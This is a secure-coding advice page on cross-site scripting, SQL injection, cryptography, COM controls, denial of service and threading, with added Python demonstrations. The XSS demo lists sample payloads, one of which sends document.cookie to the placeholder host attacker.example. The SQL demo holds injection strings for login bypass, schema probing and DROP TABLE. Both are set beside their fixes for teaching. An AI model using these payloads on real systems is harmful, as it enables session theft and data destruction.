Application Security Testing Concerns / Advice
March 17, 2009
Cross Site Scripting
Cross-site scripting (XSS) allows attackers to:
1) Execute malicious script in a client’s Web browser, in the security context of your site
2) Embed <script>, <object>, <applet>, and <embed> tags into pages your site serves
3) Steal web session information (cookies, session tokens)
4) Modify what the user sees on screen
a. Any dynamic HTML built from content that users submit is vulnerable unless that content is output-encoded for the context it lands in
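The following is an added example, not part of the original page: it renders a greeting from user-submitted content twice, once by splicing the string into the HTML as-is and once with output encoding, and checks each result against the four tags listed above. The payloads, the `attacker.example` host and the function names are constructed for this demonstration.

```python
import html
import re

# The tags the page lists as script vehicles. A correctly encoded page
# contains none of them as markup, however they were spelled in the input.
ACTIVE_TAG = re.compile(r"<\s*/?\s*(script|object|applet|embed)\b", re.IGNORECASE)


def render_unsafe(username: str) -> str:
    # Vulnerable: user-submitted content is spliced into dynamic HTML unchanged,
    # so anything the user typed is parsed by the browser as markup.
    return f"<p>Welcome back, {username}!</p>"


def render_safe(username: str) -> str:
    # Output-encoded for the HTML text (and quoted-attribute) context:
    # & < > " ' become character references, so the browser displays the
    # text and executes nothing.
    return f"<p>Welcome back, {html.escape(username, quote=True)}!</p>"


def has_active_markup(page: str) -> bool:
    """True if the rendered page still carries one of the listed tags as markup."""
    return ACTIVE_TAG.search(page) is not None


# Constructed payloads, one per tag the page lists. attacker.example is a
# placeholder host; the first payload is the classic session-cookie theft.
PAYLOADS = [
    '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>',
    '<object data="javascript:alert(1)"></object>',
    '<applet code="Evil.class"></applet>',
    '<embed src="javascript:alert(1)">',
]


if __name__ == "__main__":
    for payload in PAYLOADS:
        print("unsafe renders active markup:", has_active_markup(render_unsafe(payload)))
        print("safe renders active markup:  ", has_active_markup(render_safe(payload)))
    print(render_safe(PAYLOADS[0]))
```

`html.escape` is the right encoder only for HTML body text and quoted attribute values. Content placed into a URL, a JavaScript string, a CSS value or an unquoted attribute needs the encoder for that context; a value in an unquoted attribute, for instance, can be escaped from with a space and no `<` at all.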
SQL Injection
1) Users supply the values that become the criteria of SQL statements
2) Attackers enter values that alter the original intention of the SQL statement
3) Four common examples of SQL injection:
a. Probing databases (schema, table names, error messages)
b. Bypassing authorization
c. Executing multiple (stacked) SQL statements
d. Calling built-in stored procedures
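The following is an added example, not part of the original page: an in-memory SQLite database with a login query written twice, once by string formatting and once parameterized, plus one constructed payload for each of the first three injection classes above (the fourth, calling built-in stored procedures, has no SQLite analogue and is left out). The table, the user rows, the payloads and the function names are constructed for this demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database: two users, one of them an admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pwd TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    conn.commit()
    return conn


def login_unsafe(conn: sqlite3.Connection, name: str, pwd: str) -> list:
    # Vulnerable: the user's values are spliced into the statement text, so the
    # user controls the criteria and can change what the statement means.
    sql = f"SELECT name, role FROM users WHERE name = '{name}' AND pwd = '{pwd}'"
    return conn.execute(sql).fetchall()


def login_safe(conn: sqlite3.Connection, name: str, pwd: str) -> list:
    # Parameterized: the statement text is fixed; the values travel separately
    # and are never parsed as SQL, whatever characters they contain.
    sql = "SELECT name, role FROM users WHERE name = ? AND pwd = ?"
    return conn.execute(sql, (name, pwd)).fetchall()


def delete_user_unsafe(conn: sqlite3.Connection, name: str) -> None:
    # executescript() runs every statement in the string, so a stacked
    # injection executes. (sqlite3's execute() refuses a second statement;
    # many other database drivers do not.)
    conn.executescript(f"DELETE FROM users WHERE name = '{name}';")


def table_exists(conn: sqlite3.Connection, table: str) -> bool:
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = ?",
        (table,),
    ).fetchone()
    return row[0] == 1


# Constructed payloads, one per class of injection listed above.
BYPASS_AUTH = "alice' --"                                         # '--' comments out the password check
PROBE_SCHEMA = "x' UNION SELECT name, sql FROM sqlite_master --"  # reads the schema through the login query
STACKED = "nobody'; DROP TABLE users; --"                         # runs a second statement


if __name__ == "__main__":
    db = make_db()
    print("bypass (unsafe):", login_unsafe(db, BYPASS_AUTH, "wrong"))
    print("bypass (safe):  ", login_safe(db, BYPASS_AUTH, "wrong"))
    print("probe (unsafe): ", login_unsafe(db, PROBE_SCHEMA, "x"))
    delete_user_unsafe(db, STACKED)
    print("users table still exists:", table_exists(db, "users"))
```

The fix is the same in every driver: keep the statement text constant and pass user values as parameters, and do not reach for multi-statement execution APIs on strings that contain user data.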
Cryptographic Hacking
1) An attacker needs only 3 of the 4 cryptography components (plaintext, ciphertext, algorithm, key) to go after the fourth
2) Plaintext + Ciphertext + Algorithm > Deduce the key (a known-plaintext attack; a sound cipher with a well-generated key makes this infeasible, a weak cipher or a weak key does not)
3) Ciphertext + Algorithm + Key > Deduce the text (this is simply decryption, which is why the key must stay secret)
a. Algorithms … Do not remain a secret for long; assume the attacker knows yours
b. Key … Only as strong as the technique used to create it
COM Safe for Scripting Issues
1) Is your control really safe for scripting?
2) COM controls marked safe for scripting can be repurposed by any Web page that can instantiate them
3) Browser warnings are optional: users and policy can turn them off, so do not rely on them as a safeguard
Best Practice Medicine:
1) Implement Security as a Design Feature
2) Do Not Store Unencrypted Secret Information
a. Use cryptography
3) Sign your controls with digital signatures
4) Consider binding the control to your site
5) Use managed code
Denial of Service Attacks
1) Application or operating system failure (crashes)
2) CPU starvation
3) Memory starvation
4) Resource starvation (handles, connections, threads, disk)
5) Network starvation
Best Practice Medicine:
1) Security as a Design Feature
2) Do Not Trust User Input (bound every size, count and rate a client can specify)
3) Fail Intelligently (reject bad input with an error rather than crashing or hanging)
4) Test Security (include load tests and malformed-input tests)
Application Blocks
1) Caching Application Block
2) Offline Application Block
Cache
1) Serve repeated requests locally instead of a round trip to the server
2) Read-only reference data
3) Data destined for remote servers, held while consolidating requests
Caution
1) Avoid caching volatile data (it goes stale)
2) Avoid caching sensitive data (it lingers where it can be read)
General
1) Rely on the system garbage collector for resource reclamation
2) Avoid custom GC logic
Use a background thread for
1) Lengthy initialization
2) Remote service calls
3) I/O processing
Foreground Thread
1) Default when creating a new Thread()
2) Keeps the process alive until it finishes
Background Thread
1) Does not keep the process alive; terminated when the last foreground thread ends
2) Set the Thread.IsBackground property to true (it is a property, not a method)
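The following is an added example, not part of the original page. It shows the foreground/background difference by running a child interpreter whose main thread finishes immediately while a worker sleeps: with a foreground worker the process stays alive until the worker ends, with a background worker it exits at once. Python's `daemon` flag is the analogue of the .NET `Thread.IsBackground` property; the child script, the 5-second sleep and the function name are constructed for this demonstration.

```python
import subprocess
import sys
import textwrap

# Constructed child program. Its main thread starts one worker and returns;
# whether the process then exits depends only on the worker's flag.
CHILD = textwrap.dedent("""
    import sys, threading, time
    daemon = sys.argv[1] == "daemon"
    # The sleep stands in for lengthy initialization, a remote call or I/O.
    worker = threading.Thread(target=time.sleep, args=(5,), daemon=daemon)
    worker.start()
    # Main thread done. Foreground worker: interpreter waits 5 s.
    # Background (daemon) worker: interpreter exits now.
""")


def child_exits_promptly(daemon: bool, timeout: float = 2.0) -> bool:
    """Run the child; True if the process ended within `timeout` seconds."""
    mode = "daemon" if daemon else "foreground"
    try:
        subprocess.run([sys.executable, "-c", CHILD, mode], timeout=timeout, check=True)
        return True
    except subprocess.TimeoutExpired:
        # run() has already killed the child at this point
        return False


if __name__ == "__main__":
    print("background worker lets process exit:", child_exits_promptly(daemon=True))
    print("foreground worker lets process exit:", child_exits_promptly(daemon=False))
```

The caveat carries over from .NET: a background thread is stopped abruptly when the process ends, possibly in the middle of a write or with a lock held. Use it for work the process can afford to lose (warm-up, prefetching, polling) and keep anything that must complete or clean up on a foreground thread, or join it explicitly before exit.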
https://www.bestitdocuments.com/Samples